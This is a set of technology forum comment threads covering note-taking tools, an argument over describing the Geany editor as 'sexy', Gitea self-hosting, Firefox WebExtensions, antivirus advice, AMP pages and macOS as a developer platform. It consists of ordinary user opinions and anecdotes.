1. 4

    I use vim plus SyncThing. My wiki (and journal) contains sensitive stuff, so I avoid storing the data on publicly accessible servers. Also, no maintenance of some database.

    The obvious downside of vim is the lack of rich text, especially I cannot insert graphics or other files.

    1. 3

      I am a vim aficionado myself, but for this usecase I bit the bullet and use Emacs (+evil) with org-mode, it supports links, tables and graphics.

      1. 1

        I do similar, but with SpiderOak for sync. I’m using vimwiki set up so wiki 1 is always machine-local and wiki 2 is global. I also have a variant of this config to let me open/edit .gpg.wiki files, for content I’d like that extra layer on. I just include the .gpg in the page path and vimwiki happily plays along. Vimwiki is a little more close at hand than web-based wikis for me – I especially love the quick diary shortcut.

        Buuuut it sounds like the OP is looking for something prettier and with seamless image inclusion. With vimwiki, file attachments are just relative links to stuff I’ve dropped in the sync dir, and you can include images in the markup, then have vimwiki set to regenerate HTML copies of your pages on write, and view the pretty version through those. I haven’t even touched the HTML features, personally, just mentioning that’s about the best it can do in this area.

      1. 60

        I’m pretty uncomfortable with calling software “sexy”.

        1. 27

          Agreed. And going to a website promoting ostensibly professional software only to see “sexy” in large type multiple times just doesn’t feel work appropriate.

“the little sweet and sexy” is just not a phrase you should be using to describe software. It’s off-putting to people, and it’s generally (at least in pop culture) used by lecherous old men. This feels like yet another example of how tone deaf men in tech can be.

          1. -5

Glad you took the time to insult and signal how much better you are than those lecherous, tone deaf old men who wrote some free software for you. It’s really a great way to earn friends and show them the errors of their ways by shaming people publicly. /s

            p.s. I agree with the sentiment, and hwayne’s comment is far more appropriate than some of the others I have seen. He expresses his own opinion, not theoretical opinions of others, and doesn’t shame anyone.

p.p.s. The funny thing is, rereading my own comment, I see I am not even following my own advice! A better comment would be something like:

            I do not agree with calling potentially well meaning people “tone deaf”.

          2. 5

            Same for me, but that’s probably the sign of times. I have also the same feeling when people say that they love this company or that software.

            Of course when old established projects use such a lingo it may sound like when old people say something in teenage slang. It will feel off for teenagers and alien to other old people. Sort of uncanny valley?

            1. 3

              At some point you are reading way too far into things… It just means ‘stronger than like’ in that context.

              I love my pet dogs. I love good food. I love good software.

              1. 5

It may be because I’m not a native English speaker. In my language love is mostly reserved to the top emotion. Then if you love something (your work or music genre) it means that it can literally compete with the feeling you have to e.g. your spouse. I guess it’s something that I can’t get over. Especially regarding purely profit motivated endeavours.

                1. 4

                  Almost certainly a native/non-native speaker thing. In American English at least, ‘love’ is a pretty tame word that gets thrown around for everything. There really isn’t a specific word distinct for, e.g., the feeling one feels about their spouse; about their kids; etc. Usually ‘love’ is used there too, and context determines the level of effect.

                  Occasionally you might see modifiers like, “brotherly love”, “fatherly love”, “familial love”, etc. That’s not super common though, mostly just context to delineate the quality of the usage.

                  What is your native language? I know Greek has a few different words for different classes of ‘love’, and I imagine it’s not super uncommon, but I’m always curious about language related topics and the different quirks various languages have.

                  1. 3

I’m Polish. We say something like “brotherly love” or “fatherly love”. One can love their work, hobby and certainly their pet. But when someone says that he loves food or a thing it sounds strange. “Like” is “lubić”. “Love” is “kochać”. “Love” in context of things would be more commonly translated to “uwielbiać”. It literally means “worship”, but in this context it is really more like “love” used as “stronger than like”. So maybe it is more crazy than in English.

                    Love as a verb is “kochać”. But love as a noun is “miłość”. So “kochać” means that you feel “miłość” to somebody.

I heard people from the more pop part of the younger generation saying such things, but it sounds to me like a literal translation from English. I heard it in movies and especially children’s movies. It almost always sounded off to me, but the next generation is learning this foreign use. So I guess I’m doomed thanks to globalization ;).

                    1. 1

I’m also Polish and to be honest I find nothing strange in the usage of “love” in the context of “food or a thing” (both in Polish and in English). Considering that it seems from your LinkedIn profile that I’m older (32) than you, I think your generalizations about the younger generation are wrong :)

            2. 3

              Yes. Also: laptops, companies, fields of study, consumer electronics, genres of literature, fonts, cooking techniques…

              Unless you are literally indicating sexual attractiveness, please use a word such as “exciting”, “sleek”, or “fashionable”.

              1. 2

                I don’t think I have a problem with the sexy part, I have a problem with the screenshots make it not even look all that great. Those fonts are terrible. There’s nothing in the feature list that really even makes me want to try it out over the editors/IDEs I currently use.

                1. 3

                  I filed an issue. Please consider +1

                  https://github.com/geany/geany/issues/1672

                  1. 10

                    Is not “sexy” a gender neutral word, that can be used about both genders?

                    1. 14

                      It’s not about whether it’s gender neutral. It’s just kinda weird.

                      1. 6

                        Agree, but linked issue mentions women as if word “sexy” offends women more than men.

                        1. 9

                          Yes, sexy is gender neutral. What makes it potentially offensive to women is the association with exploitation and objectification.

                          The word itself isn’t offensive. I can say that I find my wife to be drop dead sexy, but that’s because in that context it’s entirely appropriate.

                          1. 4

                            I completely agree that sexy in context of software sounds strange at best. I just don’t think that mentioning one particular gender in that issue was needed.

                            1. -2

                              Stop taking offense on behalf of others.

                              1. 10

                                Fascinating that you see it that way. When there is a gigantic groundswell of people saying “your behavior makes me uncomfortable” I try to change that behavior.

                                I for one value women in tech. I find their presence in my day to day working life improves my productivity and the productivity of the teams I work on, as does a diversity of backgrounds, opinions and characteristics.

                                So, for me this isn’t about offense, it’s about trying to make the industry I care deeply about a more welcoming place for a group of people I also care deeply about.

                                1. 10

                                  Folks can play dumb about “sexy” alone, but when you address the complete phrase, “little, sweet, and sexy,” someone’s gotta be pretending to be reeeal oblivious to show up and say oh that’s neutral we’re not talking about software like we wanna talk about women.

                                  Anyway keep speaking up, because yeah it’s not “taking offense on behalf of others” its paying attention to them and having consideration without them having to speak every time. And I sure as heck don’t like to wade directly into this kind of talk on lobsters very often, it’s rarely worth it.

                                  1. 2

                                    Thanks. I think that’s why it’s important for people in privileged situations like myself to at least try and raise awareness. I don’t let the negative comments get to me - I was donning my asbestos underwear and wading into email/USENET threads before most of these people were born :)

                                    1. 1

                                      I can’t imagine people talking about women that way. Would be super creepy to use a phrase like “sweet and sexy” about a person instead of a thing…

                                      1. -1

Maybe you are (or someone reading this is) not aware of the counter argument so I thought I’d share: the implication in your comment is that sex necessarily exploits women, which is false. The idea that sex necessarily exploits women reinforces the belief that we must protect women from sex as we do children. This is a defining aspect of anti-sex, Third Wave feminism, which I believe runs counter to the feminist goals of dismantling fascist and patriarchal structures in society.

                                      2. 6

                                        I am very rarely seeing a groundswell of people saying “Your behavior makes me uncomfortable”.

                                        What I actually see is people saying “I assume your behavior is making somebody else uncomfortable, and I am taking the credit for ‘fixing’ you”. I far prefer the original comment from hwayne where he was talking about his own opinions, rather than imagining those of other people.

                                        1. 6

                                          My upvotes usually mean “you speak for me also”. It’s quite a time saver. :) So, to clarify, I myself personally was made uncomfortable by someone describing software as “sweet and sexy”. So much so that I only skimmed the first page or so and closed the tab.

                                          I assume they had good intentions. If I were the author, I’d work a bit more to come up with some way to express my excitement at having written something cool, without sounding creepy.

                                          1. 4

                                            And I’d like to be very clear, I don’t disagree with the argument, I disagree with some of the methods used to enforce them.

                                          2. 3

                                            I for one value women in tech. I find their presence in my day to day working life improves my productivity and the productivity of the teams I work on, as does a diversity of backgrounds, opinions and characteristics.

Non-native English speaker here. How does the term sexy offend only women and make them unwelcome to OSS? I mean, I understand the top comment (by hwayne) here saying how it would make someone uncomfortable, but I don’t understand why it is limited only to women.

1. 5

  Quoting a woman who’s a friend of mine from another context, unattributed at her request:

                                              The word “sexy” when used to mean that something is sexually attractive, is what it is. You may or may not be expressing something offensive when you use it. The word “sexy” when used to describe something that is not sexual - a car, an algorithm, a user interface - still evokes the idea of sex. It implies that you should feel sexually “turned on” by it, even if it is not literally a thing with which you would have sex. Given the cultural and historical context of our times, a professional environment where people are expected to feel sexually “turned on” by things, or where the idea of sex is constantly referred to when it is not technically relevant, is not an environment where many women will assume they are respected or even safe. You personally might go ahead and assume you are safe and respected. Many women won’t. This reduces the pool of women who are interested in applying for jobs at your company, or interested in staying once they have experienced it for awhile. The people who create the culture of a company either care about that, or they don’t.

                                        2. -1

But you are the one drawing an association between “sex” and “exploitation” and “women”.

                                  2. 7

                                    For those who are about to read: note that geany.sexy is not managed by the maintainers of the Geany IDE, so the issue didn’t end up going anywhere.

                                    1. 7

                                      This seems like a silly thing to even care about. It’s like the whole master/slave IDE cable debate. Seriously, it doesn’t need to be a big deal. It’s not even the editors official site. There are more important things to spend time on.

                                    2. -2

                                      Are you uncomfortable with sexuality in general?

                                    1. 2

                                      This is pretty gross to drop on your users. Truecaller is cool if people know they’re opting in, and have a plain dialer available, but not as the stock system app, especially switched in during an update.

                                      Also if spam call blocking is enabled by default, TC’s users are very passionate with spam flags and in my experience have caused things like bank anti-fraud checks to be blocked.

                                      They said users get 90 days of “pro” for free, then presumably the ads come back on, and Truecaller is extra annoying because it has “draw on top” permission and doesn’t only have ads inside the app, or in notifications, but puts them in a popup window over your other stuff.

                                      1. 21

                                        “made illegal” my ass, and any sort of framing like disabled people are party poopers for this sort of thing: get fucked

                                        1. 13

                                          Completely agree, and the people behind this mirroring seemed to miss the point entirely.

                                          The content wasn’t “made illegal”. The illegal part was for a public, tax funded institution to release it without meeting the requirements of ADA. Nobody’s taking down MIT’s OpenCourseWare videos, because they actually followed the law and put captioning on theirs.

It really wouldn’t surprise me if this gets a DMCA takedown notice or something like that, because mirroring it really doesn’t change the fact that it came from Berkeley without the legally required captions.

                                          1. 3

                                            According to the site, most of it was released under a creative commons license.

                                            1. 2

                                              I’m not sure that matters if it wasn’t legal to release it without captions in the first place.

                                              1. 2

It wasn’t legal for a public institution to release it without captions. CC allows you to re-distribute, maybe getting rid of captions, and I don’t believe there’s an obligation to stay ADA compliant if it’s a private (rather than state) resource.

                                                Now, it would be great to see an effort to get all of these captioned as well, but them not being deleted is a first step towards this.

                                          2. 5

                                            I agree with the sentiment, but maybe be a bit politer than just raging?

                                            1. 1

                                              This is called tone policing.

                                              1. 6

                                                Only if it’s used as criticism or harassment, and I don’t think that’s what angersock meant? I think angersock was just asking for rational discourse.

                                                1. 2

Rage very much has its place in discourse and the initial post makes it very clear why they are enraged.

                                                  1. 10

                                                    Disagree. Original post was:

                                                    “made illegal” my ass, and any sort of framing like disabled people are party poopers for this sort of thing: get fucked

                                                    This can be paraphrased (slightly) as:

                                                    This makes me angry, and fuck anybody who says the disabled people are being party poopers.

That’s an opinion and an imperative. There is no “This makes me angry (because of reasons x, y, z)”. There is no “fuck anybody (and here’s what that policy would look like)”.

                                                    It’s a yelp of anger that gets upvotes for the emotion and not the content. There isn’t anything to engage with as it’s just an unsupported opinion, and not a terribly articulate or nuanced one at that.

                                                    This sort of thing is shitposting.

                                            2. 4

                                              I agree. I REALLY don’t understand why Berkeley didn’t think out of box a little and find a way to get these subtitled :\

                                            1. 2

                                              I find it somewhat telling that they aren’t dogfooding.

                                              If your project is all about hosting code repos and you don’t host your own code, something is wrong.

                                              1. 15

                                                If they were doing that “just cuz,” I’d agree with you, but the fact they have a thorough list of what they need to self-host, plus my own experiences working on Kiln, make me give them the benefit of the doubt.

When I was working on Kiln, I was constantly pushing for self-hosting, way before the product was “ready,” for the exact reason you’re pointing out: we should put our money where our mouth was. And I won that fight pretty early, when we were right around the level of features of Gitea 1.0 or 1.1, albeit with a less-polished UI. My theory was that going to the product even before we hit our minimal internal viable product (MIVP?) would help us shape those features, and that at any rate using Kiln couldn’t be worse than using bare Mercurial hosting.

                                                Oh boy was I wrong. What actually happened was that we implemented the shittiest possible version of the missing features almost immediately so that we could get work done. I’m talking hybrid Perl/Smalltalk services running on my personal desktop busy-polling the Kiln prototype installation to generate RSS and email notifications based on hand-written rules I modified when people asked me to. I’m talking having to take time out from getting to feature completion to write a Mercurial history import rebuilder that we never would’ve had to build if we’d waited for our schema to stabilize. I’m talking shoving out a clunky ASP.NET adapter that buffered the whole Mercurial request in RAM before even starting to process the thing because it at least worked and I didn’t have time to fully wrap my head around writing a proper ISAPI plugin.

                                                The result was we got distracted from actually making Kiln work and probably lost a month doing one-off POS versions of features we knew we’d need to build properly anyway, plus damaged a bunch of internal goodwill at Fog Creek on the quality of Kiln, plus hurt our own morale by associating our own product with being incomplete and annoying. I am not proud of that decision and would not repeat it.

                                                We can argue a bit over some of the things Gitea throws in their MIVP bucket (becoming an OAuth provider would definitely be nice, but you could always just make an extra account and give your CI explicit login permissions), but a few key ones, like line comments on pull requests or improving the notification system, have really, really strong echoes of the situation I saw on Kiln. They’re targeting getting to self-hosting, and they know why they don’t want to go there yet. I support them waiting.

                                                That said, I’m happily using Gitea myself and have been really pleased with its stability, UI, and upgrade story. Doing viable backups is also really easy, and abandoning it for another Git hosting option would be really, really easy, because Git. So don’t use it if you need the same features the Gitea team does, but if it’s just a light install on a non-review-heavy workload, I’d at least give it a look.

                                                1. 2

                                                  Infrastructure is money and pain; I don’t blame them at all for using a platform that’s ready to go. Plus it seems weird to complain that they should put more of their time and money into the project?

                                                  1. 3

                                                    Luckily we got some sponsoring, so our time is the “only” investment we have to give.

                                                    1. 2

                                                      I don’t know. How much effort and expense is involved in standing up a $10 linode for hosting?

                                                      I mean, I understand what you’re saying, but at the same time, this seems to be solidly within their target audience. If hosting your own gogs/gitea is too hard, how well do you understand your audience?

                                                      1. 1

                                                        Right from their own site: Hosted and sponsored by DigitalOcean

                                                        So, for the “pain” part of it: if they’re not capable of organising someone to setup their own software on a server, I’m not sure I have much faith in their ability to write said software, or their goals for it.

                                                        1. 3

It’s not a pain to host or set up; we are providing all the infrastructure on sponsored machines. We have not started dogfooding because of the reasons mentioned above. We have also published our scripting to launch the infrastructure to be entirely open; you can find the terraform and ansible scripting at https://github.com/go-gitea/infrastructure.

                                                          1. 1

                                                            Thanks for confirmation, good luck getting to the point where you are ready to self host!

                                                      2. 1

                                                        Fair comment. I can only think that Gitea doesn’t yet provide some of the core functionality they need (maybe pull requests or an issue tracker?). That said, a quick glance at their website didn’t actually tell me what functionality they do provide.

                                                        Still, I do like the idea of a lighter weight self-hosted alternative to GitLab.

                                                        1. 2

                                                          Currently we provide only parts of the stuff we expect for hosting our code on our own. Contributions must be easy for everybody who wants to contribute, that’s why we said we need specific features to start with it.

                                                          Edit: For the list of features (needs to be updated after the 1.1.0 release) just take a look at https://docs.gitea.io/en-US/#features

                                                          1. 1

                                                            Thanks for the reply - I didn’t mean to come across as critical and apologise if I did.

                                                            https://docs.gitea.io/en-US/#features

                                                            I did see that list but it wasn’t detailed enough for me - it didn’t give me a comprehensive picture of Gitea’s functionality. I don’t want to have to install and configure something just to discover it’s missing a key feature I need.

                                                            That said, I’m definitely going to give it a try - I’d been eyeing Gogs for quite a while before the fork.

                                                            1. 2

                                                              As a result of this we have extended the feature list now: https://github.com/go-gitea/docs/pull/99

                                                              1. 1

                                                                To discover more than just the key features it’s much easier to follow the button in the middle of https://gitea.io/en-US/, there you will get to https://try.gitea.io to play around with it, no need to install anything ;)

                                                                Edit: https://try.gitea.io is always running on the latest version from the master branch.

                                                        1. 13

                                                          Well, it’s certainly not for speed. I now have beat as part of keyboard shortcuts. For example, ctrl-f beat to search in the page, because there’s a 200-800ms pause between me typing ctrl-f and when the search box is open and accepting keystrokes. Same for focusing the location bar, etc.

                                                          But really, I think it’s inertia. It’s not that the extensions I rely on don’t have equivalents in Chrome, it’s that I’ve installed them and tweaked them over the last dozen years of using Firefox and I’m used to them. If I suddenly lose my favorites like Tree-Style Tab, I’m going to stand up and look around seriously for the first time since I switched from Mozilla to Firefox 1.0.

                                                          This is why retailers like Target spend insane amounts of money on invasive, creepy things like figuring out when teenagers are pregnant. Having a kid is one of the handful of events that causes shoppers to radically change their buying habits and Target wants to become part of a new routine that will last for decades. Decisions aren’t free, so humans don’t constantly re-evaluate all their options to pick the best one. After we make a decision we coast indefinitely until something pushes us to re-evaluate.

                                                          The author keeps hearing people stay for extensions because they do. When WebExtensions rolls out and suddenly a comfortable, familiar extension disappears out from under me I’m going to be seriously annoyed at having part of my very personal config deleted for zero apparent value and I’m going to have to look around to find a replacement. I’m trying to imagine a similar offline scenario and all I can come up with is a mall salesman deliberately spilling wine on my shirt before trying to sell me a new one when I have plenty of other vendors available.

                                                          Also, speaking of value, has anyone ever articulated a single end-user value to WebExtensions? I look at Mozilla’s writeup and MDN and it’s all “WebExtensions are a cross-browser system for developing browser add-ons” and why would I give a damn? I use Firefox, those other browsers may as well not exist. The only user-visible change of WebExtensions is “a bunch of your extensions stop working and can never be fixed”. Gee, thanks! (I guess the wiki page says “should maintain acceptable security and privacy standards” but that’s never elaborated on and, paranoid as I am, I haven’t felt a lack of security and privacy because of my extensions.)

There’s an old saying, “don’t piss on my shoes and tell me it’s raining”. This feels more like “don’t piss on my shoes and tell me it’s raining and then offer to sell me shoes and also mention that you’ve lowered the quality to match that of the other vendors who are standing right over there”.

                                                          1. 4

                                                            The user-facing value is performance.

                                                            Firefox can’t compete on perf right now - by limiting the interface extensions get access to they can make a lot of optimizations which are currently impossible.

                                                            1. 2

                                                              I keep hearing this statement and have no idea what recent data it is based on.

                                                              Certainly when I measure it (and I do, because some of my apps need to run on seriously underpowered set-top boxes), Chrome is substantially slower.

I understand and accept how Chrome is safer with sandboxing, but I just can’t seem able to observe this speed advantage so many others do.

                                                              1. 1

                                                                Vanilla firefox is plenty fast.

                                                                Install a few extensions, and things change pretty quickly.

                                                                For instance, Adblock Plus is astonishingly slow, as is the lastpass extension.

                                                                1. 1

                                                                  Chrome is substantially slower

                                                                  Subjectively, Firefox feels quite a bit slower than Chrome on the same hardware (in my case, my MBP running OS X). This is with a fairly stripped down Firefox - only a few basic plugins like https Anywhere, uBlock Origin, etc. Chrome has all of those plus a whole bundle more but it still feels faster.

                                                                  As a matter of interest, what platform are you testing on and what performance difference have you measured?

                                                                  1. 3

Most of our tests were done on a Raspberry Pi 2. We ran the SunSpider benchmark, which executed in 2819ms in an at-that-time reasonably recent Chromium and in 2102ms in a no more recent Iceweasel (basically Firefox).

We also made tests of our app (an SPA compiled from TypeScript), the results of which I can’t find at the moment. What we were interested in was how quickly our app becomes operational, which is heavily influenced by the Parse/Compile cycle of JavaScript, and how it behaves afterwards, where JavaScript engine performance has a larger impact than pretty much anything else. I remember Iceweasel being noticeably faster, but I don’t remember the details.

In the end it didn’t matter much, since we usually don’t have a choice of what browser to run and most set-top boxes run a bastardized version of some old WebKit on hardware that often doesn’t include a GPU. So you have to live with what is there.

                                                                    At the end it also doesn’t matter if Firefox is actually faster, if Chrome better handles perception of it. As a user I am not browsing with a stopwatch in hand and will use whatever feels more pleasant.

                                                              2. 1

Well, it’s certainly not for speed. I now have a beat as part of keyboard shortcuts. For example, ctrl-f, beat, to search in the page, because there’s a 200-800ms pause between me typing ctrl-f and when the search box is open and accepting keystrokes. Same for focusing the location bar, etc.

                                                                Is it on a Mac, by any chance?

                                                                1. 2

                                                                  Since pushcx said ctrl, I’m guessing it’s not on a Mac. I’m on a 2015 MBP and cmd-f is practically instant for me, also “/” because I use vimperator’s search more. Vimp and Tree Style Tab are probably the heaviest extensions I run. This is the same kit I run on Windows and Linux and I can’t say I’ve noticed any search lag on them, but again I don’t use ctrl-f on the reg.

                                                                  1. 1

                                                                    Arch linux. And extending what @meredith said, it’s also / in VimFx.

                                                                1. 3

Will need to read more on this; are we really at the point that Windows Defender is all you need? Seems like bad advice to turn off all A/V.

                                                                  1. 16

I think it boils down to this: you’re safe (and don’t need AV), or you’re not safe and AV can’t save you.

If you’re running evil.jpg.exe attachments and downloading applications from P2P networks or other sketchy sources (or not checking signatures, hashes, certificates), running unpatched software or shit software in general, et cetera, then you’re in trouble and while AV could save you from some, it simultaneously opens up more avenues for attack. And the malware is constantly changing, so windows where they bypass the AV’s heuristics are likely; or you’ve got overzealous AV with too many false positives and you learn to disable it or otherwise work around it to run all the things that could or could not harm you…

                                                                    Otherwise, your system is up to date, you check your sources and only use reputable stuff (+ don’t run a lot of unnecessary junk to begin with), then you’re probably not getting malware. You might still be vulnerable to undisclosed zero days, but I’m not convinced AV can actually protect you from them. So you don’t really need AV.

                                                                    Unfortunately a lot of people end up being in some sort of middle ground where they can’t verify all the things they receive. That’s a tough place to be, but having a basic AV (that doesn’t open up more vulnerabilities) could save you from trouble. In the end, your best bet is to keep the important stuff on another machine.

                                                                    1. 1

Thanks for the insight. It’s not something that I’ve thought of for a while; whenever I’ve run a Windows machine it’s just been instinct to stick an A/V on it. Will just stick with the inbuilt stuff next time!

                                                                      1. 4

                                                                        When I used Windows, we did a combination of HIPS and sandboxing. That was often DefenseWall + SandboxIE. Another one substituted for DefenseWall in many cases. Can’t recall its name. Such measures were better than anti-virus since they prevented the problems the antivirus caused. Also, so little uptake of them that malware authors weren’t targeting bypasses at them. I doubt that changed.

                                                                        Oh yeah: don’t forget NoScript and HTTPS Everywhere. NoScript still saves me bandwidth & page load time. Unless I have to twiddle with it to get the right script among 20+. (rolls eyes) (curses site developers)

                                                                      2. 1

                                                                        Unfortunately a lot of people end up being in some sort of middle ground where they can’t verify all the things they receive. That’s a tough place to be, but having a basic AV (that doesn’t open up more vulnerabilities) could save you from trouble. In the end, your best bet is to keep the important stuff on another machine.

                                                                        I think that’s the problem area. Email is such a common attack vector these days and malware attacks are getting more and more sophisticated, with even more technically savvy users being caught. I find that ClamAV mail scanning catches a lot (I host my own email), but it’s still not perfect.

                                                                        FWIW, I’ve seen a few organisations move away from third party antivirus solutions towards Microsoft’s offerings over the past year or two. I’m not sure if that’s driven by cost or security though (perhaps both?). I could’ve sworn I saw it on Macs as well as Windows machines but I can’t seem to find any reference to a Microsoft antivirus product for OS X now. Hmm.

                                                                      3. 10

                                                                        I know you already got some replies that walked in the “no AV” direction, but I want to take it back up a step here – this article suggests sticking to Windows Defender, not turning off all AV.

                                                                        Plenty of security folks say Defender is solid, but maybe there’s this perception that since it’s free and bundled, and not playing out the kind of security theater and cross-product advertising that AV vendors tend to, that it’s a lesser option? I mean, Microsoft acquired good antivirus software and its team, and is improving and maintaining it and not turning it into a nightmare like the others.

                                                                        I think we, People of the Nerd Forums, may need to keep talking up Defender to get rid of whatever stigma there is. The important takeaway from the article is to turn off crap AV, not all.

                                                                        1. [Comment removed by author]

                                                                          1. 1

Signatures in AV nowadays are not only based on hashes of the file. They can also check what APIs your malware uses at runtime. So, when your malware gets sampled, and if your randomization function only consists of changing the encryption seed in your packer layer, there is a high probability that your sample will still be matched by the same, unchanged, signature.

                                                                            Also how many AV engines have you tried? Would you want to show the link to your test on VirusTotal?

                                                                        2. 6

I work in a somewhat AV-related position and get to see AVs’ verdicts on many digests each day (mostly AdWare / PUA). From my experience, Windows Defender is nothing close to good commercial AVs. It simply doesn’t cover as much ground and is often shipping signatures for broad campaigns quite late, if at all. Personally, I rather like the ESET NOD32 or MalwareBytes engines, and they are mostly the ones I rely on to have a clue whether a file is bad or not.

My issue with this article is that it doesn’t specify who it targets. I think most people here are more tech savvy than the general populace and have good habits, like not downloading and running random executables. Most people here probably don’t even run Windows outside of VMs… Defender is probably a nice default that doesn’t get in the way.

However, I don’t think I would recommend a family computer, used by the kids to download free games and by the parents for financial transactions, with Defender alone. The same applies to a corporate network, where good AVs can at least pick up on basic phishing and broadly targeted malware.

                                                                          1. 3

So the problem here is that most, by which I mean nearly all, of the AV software out there introduces more vulnerabilities than it patches. They wreak havoc in well written codebases, opening holes in the browser and email applications faster than those applications can close them.

                                                                            If you want to make a case for AV you are going to have to show how much value they add that outweighs the swathe of destruction they create while doing so. It’s no longer acceptable for someone to inject themselves into every process on a machine doing who knows what, increasing the attack surface for all of those apps as well as violating the principles that make something like TLS a secure transport.

The evidence is clear that the majority of the vendors have been very bad actors. There is little evidence that they provide any real value.

                                                                        1. 7

                                                                          I’ve only had AMPs come up in search results a few times, but it has literally never worked for me. I just get failure pages on Firefox Android + ublock o, so it’s become an indicator of something to avoid if I want to get to content.

                                                                          It also doesn’t seem like something I’d work too hard to target as a content publisher, either… I’d rather just take responsibility for good mobile experiences.

                                                                          1. 4

                                                                            same. AMP literally just doesn’t work for me at all. I have to go reload google in desktop mode for it to even be usable. i’m legitimately tempted to switch to Bing at this point to avoid it.

                                                                          1. 3

                                                                            I don’t mind Windows, and I don’t really have dealings with current PHP, but I understand where both have come from, how they’ve developed, and how it’s not so easy to change things so entrenched. I guess, in those regards, I respect them. I don’t think that’s such a big stretch of one’s character to achieve, so I don’t think this article is asking a whole lot of its readers. Maybe it is? I’m sure some primo devs will weigh in.

                                                                            What I’m more interested in is respecting them as in don’t be a particular asshole over it, like criticizing software and technology is obviously okay but bashing and jokes and memes are elitist, as well as old and uninteresting. Some people built this, some people are happy with this, some people are taking their baby steps with this, some people only have access to this right now, et cetera, so chill.

                                                                            1. 5

                                                                              Haha, how many years do I have to quietly read and occasionally post before I get cred for not being a throwaway and “knowing the community,” and participating with downvotes, which offer several reasons that aren’t about community, reasonably? It’s like actual new folks are meant to shitpost a few jokes for easy karma to get past the bar.

                                                                              1. 2

                                                                                I had a similar feeling. I’ve read the site daily for a couple years, but don’t tend to comment, so am well under the karma bar. It makes me wonder if the current way that karma is created and used is really lining up with what is intended.

                                                                                1. 3

                                                                                  In fairness if you don’t comment, why you gotta downvote others' comments? Post rebuttals!

                                                                                  1. 3

                                                                                    Half the time people are downvoted, they complain about sock puppet armies. Which I think is not true, but this way it’s a slightly less convenient excuse.

                                                                                1. 4

                                                                                  The “niche of a niche” section is dead-on for me. My resentment stems from the fact that it seems like there are hundreds of devices built for consumption, with only a handful that are made to be nice to use for creation, much less with good hardware/software synergy.

                                                                                  Least favorite comment about this: “oh, it’s just market economics.” I hear this (I’m admitting bias) as an economic tyranny of the majority and as prizing consumption over creation. It’s also ridiculous given the fact that Apple is one of the most successful and wealthy companies on the planet. I suspect one of the reasons OS X did so well under Steve even as the iPhone came about was the fact he had such a soft spot for NeXT.

                                                                                  Perhaps the developer experience of OS X was a pure anomaly, economically speaking. If so, I want to know what the next OS for developers is.

                                                                                  1. 3

                                                                                    IMO OSX was never very great for developers. It may be better than Windows, but it pales in comparison to Linux and the BSDs.

                                                                                    1. 3

I am a kernel programmer; I have written kernel code for various kernels, both open source and proprietary. Now I write compilers. I say this to firmly put myself into your “developer” category, and to put myself firmly out of the “GUI programmer” category.

Now, a few times in my life I had to write some GUI code. I had to use the Win32 API, MFC, .NET, Delphi, GTK, Qt, Tk, Cocoa/Obj-C (Mac and iOS). I don’t really like to do any GUI programming, but if I had to, and you’d make me use anything other than Cocoa (perhaps with Swift, never tried it), I would abandon programming and start subsistence agriculture. All the other GUI toolkits make me frustrated and angry. Cocoa (plus all the tooling, Interface Builder, etc.) is okay. I don’t like to do it, but it’s not too bad.

                                                                                      For me, this means OS X is truly great for developers.

                                                                                      1. 2

                                                                                        Except as a developer, you might not mind minor deficiencies if it actually does just work. Word, Photoshop, printers, those kinds of things just work compared to Linux, especially 10 years ago.

                                                                                        1. 1

                                                                                          Disagree. Linux does not provide nearly the same powerful abstractions that OSX does for application scripting.

                                                                                          It’s the standard problem you find with a super diverse culture - everyone has their own way of doing it, and so there’s no interoperability.

                                                                                          To be specific, KDE offers Kross, Gnome offers Bonobo or whatever their scripting thing is, and none of it actually works for all your applications because the average Linux user ends up using a patchwork of apps that come from various projects and distros.

                                                                                          1. 2

                                                                                            I’ve only used OS X for about a year and a half now, when they gave me a choice at a new job and I decided to jump straight in and figure things out on the job. I’ve been pretty happy customizing and automating what I need but most of what I do just sticks to what can be done with shells or perl – I grew up on that kinda stuff. Could you tell me what sort of work you do with app automation?

                                                                                            1. 3

                                                                                              Absolutely!

                                                                                              A super simple example for how I make my day to day life better using Apple’s inter-app scripting. I use Alfred: https://www.alfredapp.com/ as my launcher, so I do just about everything through it. I have it configured to control Spotify, which I frequently use to listen to music. I can turn volume up and down, and go to the next/previous track, or play/pause from anywhere on my Mac, no matter what app I’m using, because of an Alfred workflow someone wrote which sends scripting commands to Spotify to control it.

                                                                                      1. 16

                                                                                        I browse Lobste.rs at 120% scale and Hacker News at 170%, but I know some people like the type small so that more of it fits onto one screen. The important part is that a site responds well to zoom or other text size adjustments, or at least works well under Reader View, so everyone can read the content in the way they’re most comfortable.

                                                                                        1. 12

                                                                                          Completely agreed. Making it flexible is more important than guessing what a particular set of users will find optimal.

                                                                                          1. 4

I do break the pixel-specified CSS here, so everything is relative to Firefox’s 16px default, and when I change that, it should change everywhere.

                                                                                            body, textarea, input, button { font-size: 100%; }
                                                                                            li .link a { font-size: 110%; }
                                                                                            li .byline { font-size: 90%; }
                                                                                            

                                                                                            While I’m mentioning ✨lobste.rs modding✨, I also shuffle things around and space them evenly when previews are enabled:

// If story previews are enabled, set regular spacing and place byline below
// title.
if (document.querySelector('div.story_content')) {
  // Inject a stylesheet with fixed story height and muted byline/preview colors.
  var sheet = document.createElement('style')
  sheet.innerHTML = "\
    ol.list li.story { height: 7.5em; } \
    li.story div.byline { color: #777; } \
    li.story div.byline a { color: #777; } \
    li.story div.story_content { color: #999; font-size: 95%; }"
  document.body.appendChild(sheet)

  // Each byline that follows a preview is moved in front of it, so the
  // order becomes title, byline, preview.
  var bylines = document.querySelectorAll('div.story_content + div.byline')
  for (var e of bylines) {
    e.parentNode.insertBefore(e, e.previousElementSibling)
  }
}
                                                                                            

                                                                                            That all comes out like this

                                                                                            1. 4

                                                                                              Better have small text that’s easy for users to scale than large headlines that don’t wrap well and take ages to scroll through. In lots of ways, I think Lobste.rs and Hacker News do this best: text in simple divs, with straightforward constant sizing and no crazy wrapping techniques.

                                                                                          1. 7

                                                                                            If you’ve not planned for this contingency, you’ve not built a business, you’ve built a product. Every business owner selling at retail considers “what if my reseller goes away”. Physical goods are harder to reroute!

                                                                                            Plan for failure modes, no matter how unlikely they are. It doesn’t necessarily have to be a part of your MVP, but it should come before 2.0.

                                                                                            1. 7

You cannot distribute iOS apps any other way than the App Store (which he points out in the post). As for macOS, Dash is already available for standalone install / licensing. He even provides a link to migrating the license.

                                                                                              So I’m extremely curious what exactly you would suggest he do.

                                                                                              1. 2

                                                                                                Dash’s developer has this pretty well covered for now for macOS, but I’m sure there are other developers who don’t have an alternative storefront for their software.

